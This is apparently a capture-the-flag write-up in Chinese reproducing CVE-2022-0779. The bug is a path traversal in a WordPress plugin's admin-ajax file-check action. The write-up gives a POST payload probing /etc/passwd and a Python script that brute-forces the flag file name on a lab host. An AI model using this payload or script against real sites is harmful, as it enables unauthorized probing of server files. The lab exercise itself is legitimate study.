CVE-2022-0779复现
使用网上的资料查看/wp-admin/admin-ajax.php这个网页,使用bp抓包,修改为POST方法,输入field_name=test&filepath=/../../../../../../../../etc/passwd&field_id=um_field_4&form_key=Upload&action=um_show_uploaded_file&pf_nonce=a889600f9e&is_ajax=true
其中的pf_nonce在源码里面
bp发包
返回值中如果有"umRemoveFile"就说明该文件存在
根据题目提示访问1.txt文件
里面说明了flag在哪个文件里面
写一个代码随机生成字符串,在测试它是否存在,最后获得flag存在的文件
点击查看代码
import requestsdef getInfo(file):headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36","Content-Type": "application/x-www-form-urlencoded; charset=UTF-8","Accept": "*/*",}url = "https://eci-2ze4bj42p1b9qgqs96v7.cloudeci1.ichunqiu.com:80/wp-admin/admin-ajax.php"data = {'field_name': 'test','filepath': '/../../../../../../../../flagfile/' + file,'field_id': 'um_field_4','form_key': 'Upload','action': 'um_show_uploaded_file','pf_nonce': 'a889600f9e','is_ajax': True,'field_name': 'test',}r = requests.post(url, headers=headers, data=data)if "umRemoveFile" in r.text:return Trueelse:return Falseif __name__ == '__main__':key = '1234567890abcdefghijklmnopqrstuvwxyz'for i in range(0, 10):for w in key:file = str(i) + str(w)if getInfo(file):print(w, end="")break
输入文件名获得flag
